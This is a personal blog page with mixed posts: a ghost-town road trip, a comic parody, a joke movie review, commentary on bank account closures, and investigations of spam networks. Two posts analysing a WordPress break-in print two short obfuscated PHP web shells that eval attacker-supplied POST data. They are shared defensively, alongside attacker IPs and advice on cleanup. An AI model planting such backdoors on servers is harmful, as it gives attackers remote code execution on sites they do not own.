You are viewing tacit

It is a truth often acknowledged that I am not a master of the art of planning. I've heard people speak of the many wonderful things that can be accomplished by planning, but the details of this arcane practice have generally been a bit fuzzy to me.

When emanix and I decided to tour the various ghost towns of the Pacific Northwest, I do what I always do: I turned to the Internet. A quick Google search for "ghost towns pacific northwest" turned up a Web site called, logically enough, ghosttowns.com where I could click on states and counties and see lists of ghost towns. Precisely the thing you need if you want to, say, visit ghost towns, right?

As it turns out, it's not that simple. The site hasn't been updated in a while, and on top of that, may folks seem to have a...generous definition of "ghost town."

So it was with the ghost town of Liberty, Washington, a place that was first settled as a gold mining town in the 1800s. We were promised many wonderful things in Liberty. Fresh from the disappointment of Goodnoe, which was less "ghost town" than "a c ouple of old buildings in the middle of a farm," we set off for Liberty.

Now, it should be mentioned here that the Pacific Northwest is in the New World, and more specifically, in North America. So you can probably understand our confusion, dear readers, when we came upon a sign pointing the way to Stonehenge.

Intrigued, we followed the sign, and discovered...Stonehenge. But not Stonehenge as it is now, oh no. Stonehenge as it was when it was still in operation, in the dim and distant past.



We found a plaque that failed to shed as much light as perhaps it thought it did. Apparently, a Quaker anti-war activist commissioned a 1:1 scale model of Stonehenge in Washington as an anti-war memorial. His reasoning, which I will confess left me scratching my head, was that the original Stonehenge was used for human sacrifice, but the ultimate form of human sacrifice is war, and therefore a model of Stonehenge would be a good anti-war memorial for reasons not clear to your humble scribe. (As it turns out, the original wasn't used for human sacrifice, it being an observatory and all. I'm not sure what that does to the metaphor.)

Still, it is quite a fantastic place.



We had a discussion about whether or not building a model of Stonehenge in the US counts as cultural appropriation. Can the US culturally appropriate Great Britain's history?

A quick meal later, I was able to check "have grilled cheese sandwiches prepared on the back of a van at Stonehenge" from my bucket list.



And once again we set off, toward Liberty. Which, aftre many hours of driving, turned out to be...a still-living town whose residents have made a cottage industry out of promoting as a ghost town.

I have no photos to show you of Liberty, because it seemed weird to us to run around taking pictures of a town that was still very much occupied.

We drove through the town, disappointed, and found a narrow dirt track leading up into the mountains. Thinking, perhaps somewhat optimistically, that anything appropriately decrepit and abandoned might more likely be found on a narrow dirt track in the mountains than on a busy paved road, we ventured up the trail, thinking "we're heading into the mountains at dusk in a 22-year-old van, what's the worst that can happen?"

The road got steeper and rougher, then steeper and rougher still, and we soon found ourselves well and truly in the middle of nowhere and facing the unenviable prospect of retracing our steps after dark.

The nice thing about adventuring in the Adventure Van is we always have a bed with us, so we parked on the top of the mountain, surrounded by fantastic scenery, and did precisely that. The view from the campsite looked like this:



emanix has, it must be said, some epic mad camping skillz, which she demonstrated by building a fire and cooking dinner for us.



The day made obvious to us a small but significant flaw in my cunning plan. Clearly, if we were going to make the most of this adventure, we would need some way to separate the wheat from the chaff and focus our effort on only those ghost towns most likely to give us the best bang for our buck.

I'd like to say it was I who came up with the missing ingredient in our earlier plan, gentle readers, but that would be a filthy, filthy lie. It was in fact emanix who got the idea that would set things aright...but that's a story for the next chapter.


Sisters of Cathy

Cathy is a long-running comic strip that premiered in 1972 and has graced the pages of American newspapers for the last four decades. In all that time, the entirety of the strip has revolved around five jokes: Cathy is insecure about her weight, Cathy is insecure in her job, Cathy is insecure in her relationship, OMG gender roles, and Cathy likes to shop.

But what if...

What if the insipid innocence of the strip hides a dark secret? What if the world of Cathy is a more dangerous and dramatic place than it seems? What if Cathy lives a secret life of sinister plots and awesome goth music? What if...Cathy is really the heroine of every Sisters of Mercy song?

It turns out it works rather well.

I blame Eve for all of this. We were talking about Sisters of Mercy, my favorite band from back in my goth days, and whether Cathy was still a thing, and...

Ladies and gentlemen, may I present: Sisters of Cathy.























My two favorite strips are posted for my backers over on my Patreon blog.


Movie Review: Inside Out

I will admit to some small measure of skepticism when I first learned of Inside Out, the new animated movie from Pixar. The premise of the movie is we all have emotions living inside us, you see, that look kind of like us except Fear (which resembles a purple Al Pacino, only skinnier), and Anger, which I don't know what the hell it looks like, but it's red.



But it's Pixar, and Pixar is usually a pretty safe bet. They gave us Up, Toy Story, The Shining, Finding Nemo, and Brave, so I figured I'd give the movie a shot.


Al Pacino in Pixar's hit movie The Shining


The movie begins with the birth of the main character Ripley Riley, who is dragged non-consensually into the world nine months after the end of last year's surprise Pixar hit, Carnal Encounters of the Barest Kind. Upon the abrupt cessation of her non-existence, Ripley Riley begins to feel her first emotions, hilariously voiced by Al Pacino, gruff Al Pacino, Sigourney Weaver, unhappy Sigourney Weaver, and smug Sigourney Weaver.

Ripley Riley grows up in an idyllic Minnesota town, where she faces the normal challenges any young woman encounters on the path to maturity: she learns to play hockey, builds relationships with her parents and friends, goes to school, and drives a loader (in one particularly poignant scene, she gets a Class Two rating after her flight license is revoked).

The rest of the movie goes something like this:

Avast, ye landlubbers, there be spoilers below!Collapse )


So there we were, in the middle of the California desert, atop a mountain at 8500 feet where the sun was so brutal it burned us through our clothing and the air was so thin that walking a dozen yards meant sitting down to rest, surrounded by the ruins of cutting edge Victorian technology...

But maybe I should back up a little.

It all happened because emanix is an artist, and land in Britain is scarce and expensive.

The part about her being an artist is important because she conceived an idea for a graphic novel and decided to embark on the arduous process of birthing that idea into a real thing. And the part about land being scarce in the United Kingdom? There are no ghost towns there. People don't pack up and abandon entire cities, leaving them to crumble quietly into dust.

But I'm getting ahead of myself again.

So, the graphic novel. It's set in a ghost town, you see. And ghost towns, well, they're as thin on the ground where she lives as snowmen in the Philippines.

So it came to pass that she flew across the pond to Portland, and we set out to tour the many and varied ghost towns of the western United States. For background research, you see. We would, we thought, spend a few weeks living in the back of a camper van--tax-deductible, of course--surveying and photographing abandoned towns for the sake of making art.

That was the extent of our cunning plan...more a cunning intention, really. We are chaosbunnies, she and I. One does not become a chaosbunny by forming a plan and sticking to it.

I did some research, by which I mean I typed "ghost towns" into Google and typed the result into Google Maps. It chewed for a while, an enormous massive parallel supercomputer bending some small part of its mighty attention to the task of drawing dotted lines on a map of the western United States. We piled our suitcases into the van and we were off...

...to a Wal-Mart to get supplies and an oil change. Then we were off...

...to the Wal-Mart parking lot, to meet my sweetie zaiah, who had realized I'd forgotten my jacket and kindly ran it out to me. Then we were off...

...and realized we'd nearly forgotten ice for the cooler. That taken care of, we were off, on a three-week adventure that would take us nearly 4,000 miles, across narrow dirt trails winding high into the mountains and through trackless expanses of Forest Service land, looking for places where people had once lived and didn't any more.

The thing that worried me the most was the shovel. We'd packed a shovel, emanix and I, because she felt there might be an occasion during which we might have to poop in a hole. I've never quite got the hand of pooping in the hole. To be honest, I tend to regard the process with some suspicion, not to mention a fair degree of horror.

Minor reservations about the shovel aside, we set off with boundless optimism to venture into the desert, just the two of us and a 22-year-old van, bunny ears perched jauntily upon our heads.



The ears I'm wearing are new, a gift from emanix to replace the previous set she gave me some five or six years ago, and which, after accompanying me on countless adventures across the globe, have become somewhat shabby and dilapidated for the wear. Shabby bunny ears are a sad thing, but everyday, around-town ears are surprisingly difficult to come by.

The first leg of our plan intention had us traveling through Washington, exploring a number of old mining towns throughout the state.



There is a saying among those who practice the art of war: a plan rarely survives contact with the enemy. It might, I think, be extended just a bit, to say a plan rarely survives contact with the enemy or a chaosbunny. Two chaosbunnies in one van is, therefore, right out. (Indeed, I suspect that should your life ever bring you into contact with two chaosbunnies in one van, you might well be advised to batten down the hatches, yo, because things likely will get interesting.)

So off we went, the two of us in a van, driving along the highway without a care in the world save for running out of gas, having a breakdown, having a breakdown in the middle of the desert, having a breakdown in the middle of the desert and running out of food or water, getting bitten by a venomous snake in the middle of the desert, having a breakdown in the middle of the desert and running out of food and water and then getting bitten by a venomous snake, and being attacked by clowns. We ventured into Washington and began searching, that first night, for a hotel to stay in, figuring that the van would be our home once the trip really got going.

We pulled into the Scenic Winds Motel...



...and immediately realized that, entirely by accident, we'd started our trip in a ghost motel.





Even Norman Bates might have some reluctance to check in here.



"Ah," thought we, "this bodes well! We're finding abandoned places without really trying!"

Sadly, we couldn't actually camp here, as the proximity to the road and the rather forbidding "no trespassing" signs would, we thought, attract the attention of law enforcement, who are notorious for the absence of their sense of irony.

So we spent the night in a motel that wasn't abandoned, and set off bright and early on the first leg of our tour.

We did actually make the first stop on our planned itinerary, at Goodnoe Hills, Washington. The Internet assured us this town, first established in the 1860s and abandoned soon thereafter, would be a productive stop. We arrived, ears still jaunty, just in time to be underwhelmed.

Which is not to say that there was nothing left of the old ghost town, only that there was almost nothing left. We discovered an abandoned house that looked like it was last decorated by human hands sometime in the most hideous part of that most hideous decade, the 70s:



There was an astonishing number of birds living in a bedroom on the second floor, and the quantity of guano was something that had to be seen to be believed. Seriously. I will see it in my nightmares for decades to come.

My parents used to have this exact phone. I haven't seen one of these in a donkey's age. Kids today probably wouldn't know how to work one. No, scratch that, a lot of adults today probably wouldn't know how to work one.



Cool, in its own ghastly way, but definitely not what we were looking for.

We had a bit better luck a few blocks down the road, for some loose definition of "blocks." We found the ruins of a lovely old church, gradually crumbling into the dusty ground.





We weren't able to get inside; the church was surrounded by a barbed-wire fence with dire "no trespassing" signs plastered all over it.

Still, it was quite lovely.

A bit further on, we encountered this place. Now this, we thought, was cooking with fire. This was a proper ruin, just the sort of thing we were hoping to find.



Overall, though, Goodnoe was a bit of a wash. The locals had destroyed most of the remnants of the old town and set down farms where the buildings once stood.

This would turn out to be a recurring theme in the early part of our ghost town adventures, until we figured out a new strategy that necessitated abandoning our original plan altogether.

But that's a story for the next chapter.


Update on WordPress hack

In this blog post, I talked about a recent Wordpress hack attack on two of my WordPress sites that appears to be using a zero-day vulnerability to gain administrator access to WordPress sites.

I became aware of the attack when the security plugin WordFence notified me that someone had logged in to one of my sites using a non-existent administrator user from an IP address in St. Petersburg, Russia. The malicious individual had access to the site for eight minutes, during which he created several new admin users and uploaded a malicious file to the Plugins directory giving him the ability to execute code on the site. He was in the process of attempting to upload a file to the /wp-content/uploads directory, which I terminated when I kicked him out.

About fifteen minutes later, a similar attack took place on a second WordPress site I own. Again, the user created new administrator accounts, installed a plugin that allowed him to execute code on the server, and attempted to upload files, this time to the Themes directory. I cleaned the site and kicked him off. In both cases, I moved the login page to a different URL, hen observed while the same IP address attempted to access the old login URL.

Last night, a third site I own was compromised in the same way. This site is not yet in use, and had no content, so I observed the actions of the user.

The hostile user created new admin users, uploaded the same plugin to the plugins directory, then uploaded additional files to the /wp-content/uploads directory and the /themes directory. I downloaded these files for analysis.

The files were both PHP files, uploaded to the following locations:

/wp-content/themes/twentyfifteen/inc/file.php
/wp-content/uploads/2009/sql.php

Their contents are as follows:

file.php


<?php $sF="PCT4BA6ODSE_";$s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if (isset(${$s20}['n703018'])) {eval($s21(${$s20}['n703018']));}?>


sql.php

<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['qbc8a20'])){eval(${$s20}['qbc8a20']);}?>


Again, these malicious files appear designed to allow the attacker to execute code on compromised servers.

I urge WordPress users to take the mitigating actions I describe in the previous post, linked to above, and to check their systems carefully for the presence of malicious plugins (probably named "research_plugin_" followed by a random string), unauthorized admin users, and files whose contents are anything like what I describe above. These files may be present in one or more places in the WordPress Themes or Uploads directories.


Analysis of a new WordPress attack

I run a number of WordPress sites. Running a WordPress site is an invitation to hack attacks; it's such a popular platform that it provides an appealing target for hackers. On top of that, I have a somewhat tumultuous relationship with Eastern European organized crime that extends back quite a number of years (I've worked with law enforcement on high-profile attacks like this one), so I get a fair amount of attention from folks trying to DDoS, penetrate, or otherwise attack my sites.

The Attack

Last night, a hacker successfully penetrated one of the WordPress sites I own. I use a WordPress plugin called Word Fence that notifies me whenever anyone with administrator access logs in to one of my sites, so I responded and kicked the attacker out within eight minutes. Approximately fifteen minutes later, an attacker from the same IP address logged in to another WordPress site I run. I kicked him out of that site a few minutes later.

WordPress attackers often modify core WordPress files to install back doors, so I downloaded the contents of both sites, then did a nuke-and-pave with a new known-good WordPress install and moved the database to a different location.

I am still analyzing the attack, but there are a number of factors that have raised my suspicion that this may be a novel zero-day attack, not the least of which is the attacker gained access to both sites on the first login attempt without brute-forcing an administrator password (and yes, I use very robust passwords). Furthermore, the attacker logged in to an account named "admin," and I do not create WordPress administrator accounts with that name--I always use different names for the admin accounts.

I've done a first pass forensic analysis of the attack. These are the characteristics I observed in both attacks:

  • The first thing the attacker does is create several new administrator accounts. These accounts have names such as "administrator;" "admin;" "admin" followed by a random two or three digit number (such as "admin52"); and "root."

  • The attacker then creates new directories in the /plugins directory located in /wp-content. These directories are named "research_plugin_" followed by a random string of letters and numbers, such as "research_plugin_2hAs".

  • Next, the attacker uploads malicious PHP files into these "research_plugin" directories. The PHP files are named "research_plugin.php". Their content is located under the cut below.


Click here to see the content of the research_plugin.php fileCollapse )

(Note that the comments in the header are merely the stock comments at the beginning of the sample WordPress plugin template; they do not indicate that this code is written by WordPress or is an official WordPress plugin.)

This code looks for an HTTP POST request with a POST variable named "2hAs." The code searches for POST data with a name matching the random string of letters and numbers appended to the folder name (for example, a file uploaded to a folder named "research_plugin_6Ghq" will respond to an HTTP POST variable named "6Ghq").

If it sees it, it will decode the POST data and execute it. Effectively, this gives the attacker the ability to run code of their choosing on the hacked site.

The attacker may also attempt to modify files in the Themes directory, and will create a new, empty folder in the /wp-content/uploads directory. I don't know what changes the attacker attempts to make to the Themes files or whether the attacker attempts to upload to the /uploads directory, because in both cases I kicked the attacker out of the sites before he had finished.




The Mitigation

As soon as I'd knocked the attacker offline, nuked the sites, moved the database to a different location, and reloaded the sites with known-good backups, I turned to mitigating the attack.

It's a bit scary that the attacker got in to two sites with two different strong passwords on the first try, on fully updated sites, using an admin account that didn't exist. That rings "zero-day" alarm bells in my head.

The attacks originated from two different IP addresses, one in Russia and one in France, both of which have now been firewalled:

37.139.47.83
84.246.226.231

The first thing I did upon rebuilding the affected sites was installed a WordPress plugin that moves the standard Wordpress login URL to a different location. And, sure enough, within minutes, I saw access attempts at the standard WordPress login URL, /wp-login.php.

If you run a Wordpress site, and I know a lot of folks reading this do, I strongly urge you to take the following actions:

  • Log on to your site and look for administrator users who should not be there. Check for users named "root;" "administrator;" and "admin" followed by a number. If you did not set up an account named "admin," make sure you don't see one there.

  • Make sure you are using extremely robust passwords on all admin accounts.

  • Using an FTP program, look in your Plugins directory for anything that shouldn't be there, including any files or folders named "research_plugin" or any variant thereof. Compare what's in your Plugins folder to the plugins listed in the Plugins menu of the WordPress dashboard. If you see anything in the Plugins folder that isn't listed in your plugins menu, delete it.

  • Make sure everything is fully up to date and automatic updates are turned on. If you run multiple WordPress sites, I highly recommend the free InfiniteWP software, which will notify you of any needed updates by email and give you a single control panel where you can keep all your WordPress sites up to date with one click.

  • Install the free WordPress plugins WordFence and WPS Hide Login. WordFence is a security plugin that will monitor for and block hack attacks and notify you whenever an administrator logs in. WPS Hide Login lets you create a new URL, such as /mysecretaccesspage, where you must go in order to log in. This will block brute-force hack attacks and attacks based on login exploits.


If you discover you've been hacked, I would love to hear from you. Please leave a comment below.


Before I can really go into the things I want to talk about, I'll need to offer you, dear readers, a bit of back story.

As many folks who've read this blog over the years know, I am, among many other things, a game designer. I've developed a game called Onyx, which I've maintained and sold since the mid-1990s. Onyx is a sex game. It's designed for multiple players, who move around a virtual "game board" buying properties. When another player lands on your property, that player can pay rent or--ahem--work off the debt.

I sell Onyx on my Web site here. It's lived there for many years, and for the past thirteen years or so, I've accepted credit card payments for the registered version of the game via a merchant account provider called Best Payment Solutions.

This past April, I received notification from Best Payment Solutions that they were terminating my account. They gave no reason, other than they "sometimes terminate accounts for risk reasons." In the thirteen years I'd been with them, I'd only had one chargeback--a rather remarkable record I doubt few businesses can match. Didn't matter.

I was told that BPS would no longer work with me, but their parent company, Vantiv, would be happy to give me a merchant account. Vantiv's underwriters, I was told, had looked at my Web site and had no problem with its contents.

So i did the requisite paperwork, turned it all in, and...nothing. For weeks, during which time I was effectively out of business.

Then, four weeks later, I heard back from Vantiv. We're so sorry, they said, we thought we could give you a merchant account, but we can't. When I asked why, the only thing they would say was "risk reasons."

Thus ensued a mad scramble to find a new merchant account underwriter, a process that's normally very time-consuming and tedious. I finally found another underwriter, which I will decline to name for reasons that will become obvious once you read the rest of this post, and I'm back up and running again...but not before I was out of business for over a month.

Onyx registrations pay my rent, so as you might imagine, this has been a stressful time for me.




Okay, that's the backstory. A sad tale of a merchant account underwriter that got cold feet for no clear reason, I thought. Annoying, yes, stressful, you bet. But one of those things that just kind of happens, right? Banks make business decisions all the time. So it goes.

It turns out, though, that I'm not the only one this has happened to. Indeed, it's happened to lots and lots of people. The same pattern, across different businesses and different merchant account providers: A business receives a sudden notification that their merchant account (or in some cases, their business checking account) is being terminated. When they ask why, no answer beyond "risk reasons" is forthcoming. Porn performers, payday loan services, dating sites, fireworks sellers, porn producers, travel clubs...it's a very specific list of folks who are having this problem. And, not surprisingly, there's a reason for it.

The reason is the Department of Justice, which for the past couple of years has undertaken a project they call Operation Choke Point.

The goal of Operation Choke Point is to pressure businesses in morally objectionable fields out of business, by leaning on the banks that provide services to those businesses. If you can't get banking or credit card services, the reasoning goes, you can't stay in business. So the DoJ is approaching commercial banks, telling them to close accounts for individuals and businesses in "objectionable" industries.

It should be noted that the businesses being targeted are not breaking the law. Lawful businesses and individuals are losing access to lawful services because the government objects to them on moral grounds.

The banks being pressured to close accounts are reticent about talking about it; however, one business owner, whose instincts were in the right place, apparently managed to get a recording of a phone call in which his merchant account processor (EFT) told him they were pressured by the government to close the account. His recording has made it to a Congressional hearing looking into the program. (Some banks have reported being told that they would be investigated for racketeering if they failed to close accounts belonging to targeted businesses, despite the fact that the targeted businesses are acting lawfully.)

There's a backlash brewing. Congress is starting to hold hearings about businesses targeted without due process. The DoJ has backtracked. The FDIC, which was involved in pressuring banks to terminate targeted businesses, has reversed course. All that is good. And yet...and yet...

I can't help but think the backlash isn't because people really believe the program was wrong, but rather because it included one industry that is considered politically sacrosanct by the Obama administration's opponents: guns.

In addition to adult businesses, Operation Choke Point targeted small gun and ammo retailers. And there's a small, cynical voice inside my head that whispers, if they had contented themselves with going after people like me--people who make or sell things related to sex--would anyone have cared? The right-wing blogosphere is filled with angry rants about Operation Choke Point, as well it should be...but none of the angry rants mention adult businesses or porn. They all focus on guns. And I just really can't make myself believe that the people rising up against the program have my interests at heart. If it were just me, I believe we wouldn't hear a peep out of them.

Don't get me wrong--for once in my life, I'm glad the Republicans are taking action about something. But I hold no illusions that next time, they will still have my back.




By the time all was said and done, I lost somewhere around $700 from the problems I had. Not a lot, really, in the scheme of things, though I did have to scramble to make rent this month. It could have been worse.

I know there are a lot of folks in various adult-related businesses who read my blog. I'd really love to hear from you guys. Has this happened to you, or anyone you know? What was the outcome? Let me know!


Help make the world a sexier place!

I have a friend named Emily Bingham. She's a rope bottom and a fetish model, and if you've read this blog for a while you've doubtless seen photos I've done of her, like the ones of her tied up in the ruins of an old house I posted here (link is not safe for work, of course).

What you might not know is she's also a writer, and a damn good one at that. She's one of the top erotica writers on Amazon (under a pseudonym), and now she's launching a new project: a true memoir of her experiences and adventures in rope. The book is long, and covers thirty stories, some of them funny, some of them sexy, some of them heartbreaking.

And she needs your help.

Emily is running a crowdfunding campaign to finance the memoir. I've been lucky enough to see an early version, and it's awesome. I highly encourage you to check out her crowdfunding and help support it.



It's an important book. It covers the ups and downs--sex, erotica, assault, consent--of life in the world of BDSM, and does it unflinchingly and with absolute candor. It's the kind of book we need if we're going to help move the BDSM community in the direction of ethics and consent.

And did I mention it's sexy?

Please, check out the crowdfunding. If it appeals to you, support it.


Massive Linky-Links

I have once again reached the point where there are so many tabs open in my browser that my computer's performance is suffering. It's time for a purge, and you all know what that means: a list of links for your edification and amusement!

Society and Sexuality

Nebraska woman files Federal lawsuit against all homosexuals
Sylvia Driskell, a self-described "ambassador for God," has filed a lawsuit against all homosexuals on the grounds that God has said homosexuality is an abomination. Honestly, I feel a little sorry for her.

Police: Fraternity dosed women with date-rape drugs at party based on color-coded hand stamps
The horror show that is the American university fraternity system just never stops.

Nonmonogamy for men: the big picture
Men who are new to the idea of non-monogamy make a lot of mistakes and often have a lot of trouble finding partners. Here's a cogent analysis of why, and how not to make those mistakes.

Informatics: What an analysis of one million sex toy sales tells us about our erotic tastes, kinks, and desires
Two of my favorite things (sex and informatics) in one place! This is an awesome article.

So you're not desirable...
Article by the authors of a paper recently published in the Journal of Personality and Social Psychology that suggests who you are--your uniqueness--is more valuable to prospective partners than traditional markers like physical attractiveness or money. Seems the advice "be yourself!" now has scientific evidence behind it.

What happened when I posed as a man on Twitter
You know how women say they get a lot of shit that men don't get on social media, and men say naaw, women are just exaggerating 'cause they're all thin-skinned and emotional and stuff? Surprise, surprise, it turns out women actually do get more shit on social media.

Science

Scientific American: Alien Supercivilizations Absent from 100,000 Nearby Galaxies
Dyson spheres and other huge-scale macroengineering projects should be visible from earth even if they are located in distant galaxies. But we don't see any sign of them. Where is everyone? (I've written a bit about the Fermi paradox in this blog here.)

Random Strangeness

Photographs of superheroes wearing "outfits" made of milk--and nothing else
Just what it says on the tin. Probably not safe for work.

Software engineering, now with cats
How modern software engineers would design a cat. As a computer programmer, this is, I can attest, altogether too true.

Every noise at once
Comprehensive clickable interactive map of every kind of music you can imagine.

And finally, there's this gem from YouTube: a lovely hand-crafted 2-stroke engine with a transparent combustion chamber so you can see the fire.



eAffiliate Marketing Spam: How It Works

A short while ago, I blogged about why I'm moving off Namecheap as my domain registrar. In the past six or seven months, I've received a tidal wave of spam advertising domains hosted on Namecheap, and their abuse team has proven to be remarkably incompetent at dealing with the problem.

The flood continues unabated. Diet pills, life insurance quotes, ultra-right-wing conspiracy sites, Home Depot windows...everything and anything you can imagine getting spam for, all of it advertising Namecheap-hosted sites.

I've been logging all the spam, and doing a bit of digging. The Namecheap domains are being registered at a fantastic clip, scores a day, each one used in spam runs for perhaps 24 to 48 hours before being rotated to a new one. And, interestingly, the domains are all registered in the clear rather than through a privacy service, so the registrant information is plainly visible.

These domains--scores and scores and scores of them--all have the same information:

whois healthybodynewletter.us
Domain Name: HEALTHYBODYNEWLETTER.US
Domain ID: D49677935-US
Sponsoring Registrar: ENOM, INC.
Sponsoring Registrar IANA ID: 48
Registrar URL (registration services): whois.enom.com
Domain Status: clientTransferProhibited
Variant: HEALTHYBODYNEWLETTER.US
Registrant ID: 377EE235E374635C
Registrant Name: Coloplatinum Hosting Coloplatinum Hosting
Registrant Organization: Coloplatinum Hosting
Registrant Address1: PO Box 96503
Registrant City: Washington
Registrant State/Province: DC
Registrant Postal Code: 20090
Registrant Country: United States

A quick Google search for "Coloplatinum Hosting" turns up this page on Spamhaus. Coloplatinum Hosting is one of many business names used by a well-known and extremely prolific spammer named Mike Boehm.

I kept digging, using programs like wget to visit the Spamvertised domains. The links in the spam emails lead to domains hosted by Namecheap Hosting, which redirect to click-trackers hosted by various affiliate marketing companies, which in turn redirect to the actual spam sites--and there are zillions of them. Mike Boehm is a busy guy, and he will spamvertise anything. Amazon and Walmart gift cards. Laissez Faire Books, a right-wing Libertarian book store. Fundamentalist end-of-days Web sites. Quack "medicine" sites offering to cure diabetes, make you slim, and protect you from heart attacks. Woodworking sites. There is, it seems, just about nothing he won't spam.

I spent some time mapping out his spam network. It looks something like this:



I've received tons of spam from him in the past, using domains hosted all over the place. These days, he has chosen Namecheap as his registrar and host of choice; all the spam I'm receiving from him is currently hosted by Namecheap.

He is using three affiliate advertising tracking companies: Flex Marketing Group, Clickbank, and Clickbooth.

I've reached out to all three companies with spam reports. Clickbank has generally been pretty good about shutting down his affiliate codes, but they're not good at being proactive; in two or three days, he spamvertises more domains with fresh new Clickbank affiliate IDs.

Flex Marketing Group has what is on paper a very tough anti-spam policy. In practice, it's totally bogus. They have responded to email spam complaints by blocking me on social media, but haven't done anything else.

Clickbooth appears to be a "listwasher"--a company that assists spammers by removing the email addresses of people who complain about spam. Legitimate companies don't support spammers. Listwashers support spammers, permit spam, and assist the spammers in removing email addresses of people who are likely to complain about spam:



EDIT: The day after this post went live, I received the following email from Clickbooth:

Dear Franklin,

Thank you for your email. Please be advised that adding email addresses to suppression lists is only one of the actions taken in response to spam complaints. In the case referenced in your recent complaint, additional action was taken and the affiliate account was terminated. If you have additional questions about Clickbooth compliance our full set of guidelines may be found here: http://support.clickbooth.com/support/solutions/folders/146482.


So it appears Clickbooth is indeed proactive about dealing with spammers. Score one for the good guys!


The affiliate marketing companies then redirect to the actual sites, and in the process generate money for the spammer.

The flow of money looks like this:



Namecheap appears to be getting a reputation for supporting spammers. I looked at their Wikipedia entry, and it has this line (and no, I didn't write it; I don't even have a Wikipedia account):



It's not hard to see why. Mike Boehm spends a lot of money on domain registrations, buying them by the dozens. Each one is used in one or two spam runs. Namecheap eventually shuts them down, sometimes, after weeks or months have gone by, but in the meantime he's registered way more. Based on the number of spam emails I'm receiving, typically 16-22 per day 5 days a week, and the type of registration (.us domains are currently his favorite), Namecheap is making at least $24,000 a year from him. That's a conservative estimate; I probably don't personally receive examples of every one of his spam runs.

So it's no surprise that Namecheap is slow to close his domains, and reluctant to do so. They consistently find all kinds of excuses not to disable all the spam domains he uses. Here are some emails I've received from Namecheap, typically a month or so after I file a spam report:



Well, yes, he isn't sending the spam emails themselves from the spamvertised domains; almost no spammers do that.



Apparently, Namecheap waits for anti-spam services to blacklist a domain before they'll suspend it...by which time the spammer has long since moved on to advertising the next domain.




This spam system depends on the cooperation of a number of different people and organizations, some of whom are actively or tacitly complicit, others of whom are likely completely ignorant.

Companies like Walmart, T-Mobile, Amazon, Home Depot, and others probably don't know they're supporting a spammer. They set up affiliate programs with affiliate network companies they believe to be reputable, and naively don't pay close attention to how those affiliate programs are run.

Companies like Flex Marketing are more actively complicit. They receive money for every click or every purchase from the affiliate marketers--you get a spam email advertising new windows from Home Depot or offering life insurance quotes from Fidelity Life, click the link, and those companies pay money to Flex Marketing or Clickbooth or Clickbank. Flex Marketing, Clickbooth or Clickbank then pay some of that money to Mike Boehm for the referral.

The affiliate marketing companies--Flex Marketing, Clickbooth and Clickbank--are aware of what's going on, but take action only after spam is reported (Clickbank) or not at all (Flex Marketing).

Of course, the less reputable sites--the ones selling fake heart attack medications, phony diabetes cures, videos about the coming Apocalypse, books on how the US government is planning to kill all the Christians, gambling sites, and so on--are absolutely aware they're being advertised by spam, and they don't care. (The fact that companies like Flex Marketing, Clickbooth and Clickbank accept them as customers is pretty telling.)

So Namecheap hosts spam sites, affiliate marketing companies monetize the clicks on spam emails, some of that money goes to the spammer, and some of that money is retained by the affiliate marketing companies. The money ultimately comes from legitimate businesses such as Home Depot and T-Mobile or fringe sites selling fake medications or online gambling, who get it from people who sign up for their services or buy their products.

I have reached out to the companies who support this particular spammer by email and social networking and invite their comments on this entry.


Namecheap: Why I'm moving away from them

I have a rather extensive collection of Web sites, where I write about everything from photography to transhumanism to sex. As a result, I have rather a lot of domain names, which until recently I've registered with Namecheap, as they have in the past been cheap and reasonably reliable.

However, I have begun the painful and expensive process of moving off Namecheap, and I recommend others do the same. There are two interrelated reasons for this, the first having to do with poor support and training (Namecheap employees don't appear to know the differnce between a domain and a subdomain, which is rather a serious problem when you're in the business of domains) and the second having to do with support for spam and malware (largely on account of the first).

The story is long and complicated, but it begins many months ago with a spam email advertising life insurance, which was plugging a domain hosted on Namecheap Hosting.

Namecheap, in addition to being a domain registrar (well, technically a reseller for a registrar called Enom), is also a Web hosting company. If you're a Web hosting company, sooner or later a spammer will host a Web site with you. How you react when you receive abuse reports will determine how popular you are with spammers. If you react quickly, spammers will avoid you. If you allow the site to remain up, spammers will talk, and soon other spammers will flock to you. If you continue to leave spam domains up, pretty soon spammers will start choking out your other customers.

Anyway, it happens. A spammer found Namecheap Hosting. I hadn't seen much spam on Namecheap before, so I fired off an abuse report and that was the end of it.

Or so I thought. But then things took a turn for the strange.

A couple of days later, I received an email from Namecheap abuse saying "we aren't hosting this domain, go complain to someone else." Now, that happens from time to time as well; spammers will sometimes hop from one host to the next, so by the time a host receives a complaint, the spammer's Web site has been moved and they're not hosting it any more.

I looked at the domain. Still hosted on Namecheap. I wrote back saying "no, it's definitely hosted by you guys; here's the IP address, 162.255.119.254. That address is in your space."

And got back a second email: "We're not hosting this site."

"Huh," I thought, "that's strange. Maybe the site is hosted on many IP addresses?" That's another spam tactic, putting a Web site on a bunch of hosts and then changing the IP address constantly. But no, the site had only ever been hosted by Namecheap.

I replied and said "no, here's the DNS entry, ere's the history for the site, you're definitely hosting it." And got back yet another reply: "no we're not."

And then something even weirder happened.

I started getting tons of spam advertising domains pointing to Namecheap's IP address space. Tons. Spam advertising life insurance, promoting Bitcoin schemes, advertising phony "cures" for diabetes. Spam pitching window replacement services, Amazon gift cards, Russian dating sites, and home refinancing.

And I'd seen this spam before. It was word-for-word and image-for-image identical to spam from well-known, infamous spam purveyors that had always, until now, advertised sites hosted in Russia, Columbia, and the Ukraine--places that tend to permit spam hosting.

I started getting multiple pieces of this spam a day. Then dozens. All of it advertising domains on Namecheap IP addresses.

  
Left: Old spam advertising a site hosted in Eastern Europe. Right: Recent spam advertising a site on Namecheap.


I sent spam reports to Namecheap...and Namecheap's abuse team kept sending responses saying "we aren't hosting these sites."






This is the point where I learned that Namecheap, a company that sells domain names, does not understand how a domain name works.

A typical domain name has three (or more) parts. The parts are separated by periods. Let's look at an example:

www.morethantwo.com

Going from right to left: The last part is called a "top level domain," or "TLD". It's things like ".com" or ".net" or a country-specific code like ".ca" (for Canadian sites). The UK uses ".co.uk" for various historical reasons.

The part before the TLD, in this case morethantwo, is the domain name.

